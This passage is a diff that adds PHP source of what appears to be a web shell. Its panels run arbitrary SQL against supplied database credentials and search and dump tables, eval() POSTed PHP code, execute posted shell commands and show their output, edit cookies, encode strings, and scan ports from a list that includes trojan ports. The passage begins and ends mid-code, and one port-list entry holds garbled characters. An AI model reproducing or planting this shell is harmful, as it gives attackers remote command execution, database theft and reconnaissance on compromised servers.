- '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + if (!empty($_GET['dxsql_d'])) + { + print "\n\t".'<table border=0 cellspacing=0 cellpadding=0>'; + print "\n\t".'<caption>Tables:</caption>'; + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); print "\n\t".'<tr><td class="listing"><nobr>'.(($TRowCnt[0][0]>0)?'&gt; ':'&nbsp;&nbsp;').$TABLES[$i].'</td></tr>'; + } + print "\n\t".'</table>'; + } + print "\n".'</td><td width=100%>'; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'[?] Can run several querys if divided by ";"<br>If smth is wrong with charset, write first: SET NAMES cp1251;'; + print "\n".'<textarea name="dxsql_q" rows=10 style="width:100%;">'.((empty($_POST['dxsql_q']))?'':$_POST['dxsql_q']).'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Query" class="submit"> ' + .'<input type=submit name="dxparam" value="Download Query" class="submit"></div></form>' + .'<br>'; + + if (empty($_POST['dxsql_q'])) die('</td></tr></table>'); + $_POST['dxsql_q']=explode(';', $_POST['dxsql_q']); + + foreach ($_POST['dxsql_q'] as $CUR_Q) + { if (empty($CUR_Q)) continue; + $CUR_Q.=';'; + + $num=DxMySQL_FetchResult(DxMySQLQ($CUR_Q, true), $FETCHED, false); + if ($num<=0) continue; + + print "\n\n\n".'<table border=0 cellspacing=0 cellpadding=0><caption>'.$CUR_Q.'</caption>'; + + $INDEXES=array_keys($FETCHED[0]); + print "\n\t".'<tr><td class="listing" colspan='.(count($INDEXES)+1).'>&gt;&gt; Fetched: '.$num. str_repeat('&nbsp;', 10). 
'Affected: '.mysql_affected_rows().'</td></tr>'; + print "\n\t".'<tr><td class="listing"><div align=center class="highlight_txt">###</td>'; + foreach ($INDEXES as $key) print '<td class="listing"><div align=center class="highlight_txt">'.$key.'</td>'; + print '</tr>'; + + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr><td class="listing" width=40><div align=right class="highlight_txt">'.$l.'</td>'; + for ($i=0; $i<count($INDEXES); $i++) + print '<td class="listing"> '.DxDecorVar($FETCHED[$l][ $INDEXES[$i] ], true).'</td>'; + } + + print "\n".'</table><br>'; + } + print "\n".'</td></tr></table>'; + } + +######## +######## SQL Search +######## +if ($_GET['dxmode']=='SQLS') + { + if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' 
- '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + if (isset($_POST['dxsqlsearch']['txt'])) + if (get_magic_quotes_gpc()==1) $_POST['dxsqlsearch']['txt']=stripslashes($_POST['dxsqlsearch']['txt']); + + print "\n\t".'<SELECT MULTIPLE name="dxsqlsearch[tables][]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" ' + .( (isset($_POST['dxsqlsearch']['tables']))? ((in_array($TABLES[$i], $_POST['dxsqlsearch']['tables']))?'SELECTED':'') :'SELECTED' ).'>' + .$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>'; + print "\n".'<input type=text name="dxsqlsearch[txt]" style="width:100%;" value="'.((empty($_POST['dxsqlsearch']['txt']))?'':str_replace('"', '&quot;', $_POST['dxsqlsearch']['txt'])).'">'; + print "\n".'<br>'; + foreach (array('Any', 'Each', 'Exact', 'RegExp') as $cur_rad) + print '<input type=radio name="dxsqlsearch[mode]" value="'.strtolower($cur_rad).'" ' + .( (isset($_POST['dxsqlsearch']['mode']))? (($_POST['dxsqlsearch']['mode']==strtolower($cur_rad))?'CHECKED':'') :(($cur_rad=='Any')?'CHECKED':'') ) + .' class=radio>'.$cur_rad.'&nbsp;&nbsp;&nbsp;'; + print "\n".'<div align=right><input type=submit value="Search..." 
class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + + if (!isset($_POST['dxsqlsearch'])) die('</td></tr></table>'); + + if (empty($_POST['dxsqlsearch']['tables'])) die(DxError('No tables selected')); + + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each'))) $_POST['dxsqlsearch']['txt']=explode(' ', mysql_real_escape_string($_POST['dxsqlsearch']['txt'])); + else $_POST['dxsqlsearch']['txt']=array($_POST['dxsqlsearch']['txt']); + + + $GLOBALFOUND=0; + foreach ($_POST['dxsqlsearch']['tables'] as $CUR_TABLE) + { $Q='SELECT * FROM `'.$CUR_TABLE.'` WHERE '; + $Q_ARR=array(); + DxMySQL_FetchResult(DxMySQLQ('SHOW COLUMNS FROM `'.$CUR_TABLE.'`;', true), $COLS, true); for ($i=0; $i<count($COLS);$i++) $COLS[$i]=$COLS[$i][0]; + foreach ($COLS as $CUR_COL) + { if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'each', 'exact'))) + { for ($i=0;$i<count($_POST['dxsqlsearch']['txt']);$i++) + $Q_ARR[]=$CUR_COL.' LIKE "%'.($_POST['dxsqlsearch']['txt'][$i]).'%"'; + } + else $Q_ARR[]=$CUR_COL.' REGEXP '.$_POST['dxsqlsearch']['txt'][0]; + + if ($_POST['dxsqlsearch']['mode']=='each') + { $Q_ARR_EXACT[]=implode(' AND ', $Q_ARR); + $Q_ARR=array(); + } + } + if (in_array($_POST['dxsqlsearch']['mode'], array('any', 'exact'))) $Q.=implode(' OR ', $Q_ARR).';'; + if ($_POST['dxsqlsearch']['mode']=='each') $Q.=' ( '.implode(' ) OR ( ', $Q_ARR_EXACT).' );'; + if ($_POST['dxsqlsearch']['mode']=='regexp') $Q.=' ( '.implode(' ) OR ( ',$Q_ARR).' );'; + + /* $Q is ready */ + + if (($num=DxMySQL_FetchResult(DxMySQLQ($Q, true), $FETCHED, true))>0) + { + $GLOBALFOUND+=$num; print "\n\n".'<table border=0 cellspacing=0 cellpadding=0 align=center><caption>'.$num.' matched in '.$CUR_TABLE.' 
:</caption>'; + print "\n\t".'<tr><td class=listing><font class="highlight_txt">'.implode('</td><td class=listing><font class="highlight_txt">', $COLS).'</td></tr>'; + for ($l=0;$l<count($FETCHED);$l++) + { + print "\n\t".'<tr>'; + for ($i=0; $i<count($FETCHED[$l]); $i++) print '<td class="listing"> '.DxDecorVar($FETCHED[$l][$i], true).'</td>'; + print '</tr>'; + } + print "\n".'</table><br>'; + } + } + print "\n".'<br>Total: '.$GLOBALFOUND.' matches'; + + print "\n".'</td></tr></table>'; + } + +######## +######## SQL Dump +######## +if ($_GET['dxmode']=='SQLD') + { if (!isset($_GET['dxsql_s'], $_GET['dxsql_l'], $_GET['dxsql_p'], $_GET['dxsql_d'])) die(DxError('SQL server/login/password/database are not set')); + + if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0)) + die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error())); + else print '&gt;&gt; MySQL connected!'; + + if (!mysql_select_db($_GET['dxsql_d'])) + die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' 
- '.mysql_error())); + + print "\n".'<table border=0 cellspacing=0 cellpadding=0><tr><td class=h2_oneline><h2>DB:</h2></td>'; + print "\n".'<td class=linelisting><font class=highlight_txt>'.((empty($_GET['dxsql_d']))?'&lt;Server&gt;':$_GET['dxsql_d']).'</font></td></tr></table>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 cellspacing=0 cellpadding=0 width=100%>'; + print "\n".'<tr><td width=1% class=h2_oneline style="vertical-align:top;">'; + + DxMySQL_FetchResult(DxMySQLQ('SHOW TABLES;', true), $TABLES, true); + for ($i=0;$i<count($TABLES);$i++) $TABLES[$i]=$TABLES[$i][0]; + asort($TABLES); + + print "\n\t".'<SELECT MULTIPLE name="dxsql_tables[]" SIZE=30>'; + for ($i=0;$i<count($TABLES);$i++) + { + DxMySQL_FetchResult(DxMySQLQ('SELECT COUNT(*) FROM `'.$TABLES[$i].'`;', true), $TRowCnt, true); + if ($TRowCnt[0][0]>0) + print "\n\t".'<OPTION value="'.$TABLES[$i].'" SELECTED>'.$TABLES[$i].'</OPTION>'; + } + print "\n\t".'</SELECT>'; + print "\n".'</td><td width=100%>You can set a pre-dump-query(s) (ex: SET NAMES cp1251; ):'; + print "\n".'<input type=text name="dxsql_q" style="width:100%;">'; + print "\n".'<br>'; + print "\n".'<div align=right>' + .'GZIP <input type=checkbox name="dx_gzip" value="Yeah, baby">'.str_repeat('&nbsp;', 10) + .'<input type=submit value="Dump!" 
class=submit style="width:100pt;"></div>'; + print "\n".'</form>'; + } + + ################################### + +######## +######## PHP Console +######## +if ($_GET['dxmode']=='PHP') + { + if (isset($_GET['dxval'])) $_POST['dxval']=$_GET['dxval']; + + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td class="linelisting">'; + $PRESETS=array_keys($GLOB['VAR']['PHP']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<a href="'.DxURL('leave', 'dxmode').'&dxval=dxpreset__'.$PRESETS[$i].'" class=no>['.$PRESETS[$i].']</a>' + .( ($i==(count($PRESETS)-1))?'':str_repeat('&nbsp;',3) ); + print "\n\n".'</td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['PHP']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['PHP']['Presets'][$_POST['dxval']]; + } + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=15 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right><input type=submit value="Eval" class="submit" style="width:200pt;"></div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { print str_repeat("\n", 10).'<!--php_eval-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + eval($_POST['dxval']); + print str_repeat("\n", 10).'<!--/php_eval-->'.'</td></tr></table>'; + } + } + + ################################### + +######## +######## Cookies Maintenance +######## +if ($_GET['dxmode']=='COOK') + { + if ($DXGLOBALSHIT) DxWarning('Set cookie may fail. This is because "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit =('); print 'Found <font class="highlight_txt">'.($CNT=count($_COOKIE)).' 
cookie'.(($CNT==1)?'':'s'); + + print "\n".'<div align=right><a href="'.DxURL('leave', '').'">[RELOAD]</a></div>'; + + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<table border=0 align=center><tr><td class=linelisting><div align=center><font class="highlight_txt">Cookie name</td><td class=linelisting><div align=center><font class="highlight_txt">Value</td></tr>'; + for ($look_len=1, $maxlen=0; $look_len>=0;$look_len--) + { + if ($maxlen>100) $maxlen=100; + if ($maxlen<30) $maxlen=30; + $maxlen+=3; + for ($INDEXES=array_keys($_COOKIE), $i=0;$i<count($INDEXES);$i++) + { + if ($look_len) {if (strlen($_COOKIE[ $INDEXES[$i] ])>$maxlen) {$maxlen=strlen($_COOKIE[ $INDEXES[$i] ]);} continue;} + print "\n".'<tr><td class=linelisting>'.$INDEXES[$i].'</td>' + .'<td class=linelisting><input type=text ' + .'name="dxparam['.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $INDEXES[$i]).']" ' + .'value="'.str_replace(array('"', "\n", "\r", "\t"), array('&quot;',' ',' ',' '), $_COOKIE[ $INDEXES[$i] ]).'" ' + .'SIZE='.$maxlen.'></td>' + .'</tr>'; + } + if (!$look_len) + { + print "\n".'<tr><td colspan=2><div align=center>[Set new cookie]</td></tr>'; + print "\n".'<tr><td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][NAM]" value="" style="width:99%;"></td>' + .'<td class=linelisting><input type=text name="dxparam[DXS_NEWCOOK][VAL]" value="" SIZE='.$maxlen.'></td>' + .'</tr>'; print "\n".'<tr><td class=linelisting colspan=2 style="text-align:center;">' + .'<input type=submit value="Save" class="submit" style="width:50%;">' + .'</td></tr>'; + } + } + print "\n".'</table></form>'; + } + + ################################### + +######## +######## Command line +######## +if ($_GET['dxmode']=='CMD') + { + print "\n".'<table border=0 align=right><tr><td class=h2_oneline>Do</td><td>'; + print "\n".'<SELECT name="selector" 
onchange="document.getElementById(\'dxval\').value+=document.getElementById(\'selector\').value+\'\n\'" style="width:200pt;">'; + print "\n\t".'<OPTION></OPTION>'; + $PRESETS=array_keys($GLOB['VAR']['CMD']['Presets']); + for ($i=0; $i<count($PRESETS);$i++) + print "\n\t".'<OPTION value="'.str_replace('"','&quot;',$GLOB['VAR']['CMD']['Presets'][ $PRESETS[$i] ]).'">'.$PRESETS[$i].'</OPTION>'; + print "\n\n".'</SELECT></td></tr></table><br><br>'; + + if (isset($_POST['dxval'])) + if (strpos($_POST['dxval'], 'dxpreset__')===0) + { + $_POST['dxval']=substr($_POST['dxval'], strlen('dxpreset__')); + if (!isset($GLOB['VAR']['CMD']['Presets'][$_POST['dxval']])) die(DxError('Undeclared preset')); + $_POST['dxval']=$GLOB['VAR']['CMD']['Presets'][$_POST['dxval']]; + } + + $warnstr=DxExecNahuj('',$trash1, $trash2); + if (!$warnstr[1]) DxWarning($warnstr[2]); print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=5 style="width:100%;">'.((isset($_POST['dxval']))?$_POST['dxval']:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit value="Exec" class="submit" style="width:100pt;"> ' + .'</div>'; + print "\n".'</form>'; + if (isset($_POST['dxval'])) + { + $_POST['dxval']=split("\n", str_replace("\r", '', $_POST['dxval'])); + for ($i=0; $i<count($_POST['dxval']); $i++) + { + $CUR=$_POST['dxval'][$i]; + if (empty($CUR)) continue; + + DxExecNahuj($CUR,$OUT, $RET); + print str_repeat("\n", 10).'<!--'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'<table border=0 width=100%><tr><td class=listing>'."\n\n"; + + print '<span style="position:absolute;left:10%;" class="highlight_txt">Return</span>'; + print '<span style="position:absolute;right:30%;" class="highlight_txt">Output</span>'; + print '<br><nobr>'; + print "\n".'<textarea rows=10 style="width:20%;display:inline;">'.$CUR."\n\n".( (is_array($RET))?implode("\n", $RET):$RET).'</textarea>'; + print "\n".'<textarea rows=10 style="width:79%;display:inline;">'."\n".( 
(is_array($OUT))?implode("\n", $OUT):$OUT).'</textarea>'; + print '</nobr>'; + print str_repeat("\n", 10).'<!--/'.$warnstr[2].'("'.$CUR.'")-->'."\n\n".'</td></tr></table>'; + } + } + } + + ################################### + +######## +######## String functions +######## +if ($_GET['dxmode']=='STR') + { + if (isset($_POST['dxval'], $_POST['dxparam'])) + { $crypted=''; + if ($_POST['dxparam']=='md5') $crypted.=md5($_POST['dxval']); + if ($_POST['dxparam']=='sha1') $crypted.=sha1($_POST['dxval']); + if ($_POST['dxparam']=='crc32') $crypted.=crc32($_POST['dxval']); + if ($_POST['dxparam']=='2base') $crypted.=base64_encode($_POST['dxval']); + if ($_POST['dxparam']=='base2') $crypted.=base64_decode($_POST['dxval']); + if ($_POST['dxparam']=='2HEX') for ($i=0;$i<strlen($_POST['dxval']);$i++) $crypted.=strtoupper(dechex(ord($_POST['dxval'][$i]))).' '; + if ($_POST['dxparam']=='HEX2') {$_POST['dxval']=str_replace(' ','',$_POST['dxval']); for ($i=0;$i<strlen($_POST['dxval']);$i+=2) $crypted.=chr(hexdec($_POST['dxval'][$i].$_POST['dxval'][$i+1]));} + if ($_POST['dxparam']=='2DEC') {$crypted='CHAR('; for ($i=0;$i<strlen($_POST['dxval']); $i++) $crypted.=ord($_POST['dxval'][$i]).(($i<(strlen($_POST['dxval'])-1))?',':')');} + if ($_POST['dxparam']=='2URL') $crypted.=urlencode($_POST['dxval']); + if ($_POST['dxparam']=='URL2') $crypted.=urldecode($_POST['dxval']); + } + if (isset($crypted)) print $_POST['dxparam'].'(<font class="highlight_txt"> '.$_POST['dxval'].' 
</font>) = '; + print "\n".'<form action="'.DxURL('leave', '').'" method=POST>'; + print "\n".'<textarea name="dxval" rows=20 style="width:100%;">'.((isset($crypted))?$crypted:'').'</textarea>'; + print "\n".'<div align=right>' + .'<input type=submit name="dxparam" value="md5" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="sha1" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="crc32" class="submit" style="width:50pt;"> '.str_repeat('&nbsp;', 5) + .'<input type=submit name="dxparam" value="2base" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="base2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2HEX" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="HEX2" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2DEC" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="2URL" class="submit" style="width:50pt;"> ' + .'<input type=submit name="dxparam" value="URL2" class="submit" style="width:50pt;"> ' + .'</div>'; + print "\n".'</form>'; + } + +######## +######## Port scaner +######## +if ($_GET['dxmode']=='PRT') + { + print '[!] 
For complete portlist go to <a href="http://www.iana.org/assignments/port-numbers" target=_blank>http://www.iana.org/assignments/port-numbers</a>'; if (isset($_POST['dxportscan']) or isset($_GET['dxparam'])) + $DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object 
Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ 
DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple 
NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',); + + if (isset($_GET['dxparam'])) + { print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' 
ports:</td></tr>'; + $INDEXES=array_keys($DEF_PORTS); + for ($i=0;$i<count($INDEXES);$i++) + print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>'; + print "\n".'</table>'; + die(); + } + + if (isset($_POST['dxportscan'])) + { $OKAY_PORTS = 0; + $TOSCAN=array(); + + if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS); + else + { $_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']); + for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++) + { $_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]); + if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0]; + else + $TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]); + $_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]); + } + $_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']); + } + + print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>'; + list($usec, $sec) = explode(' ', microtime()); + $start=(float)$usec + (float)$sec; + for ($i=0;$i<count($TOSCAN);$i++) + { $cur_port=&$TOSCAN[$i]; + $fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']); + if ($fp) + { $OKAY_PORTS++; + $port_name=''; + if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port]; + print "\n".'<tr><td width=50 class=listing 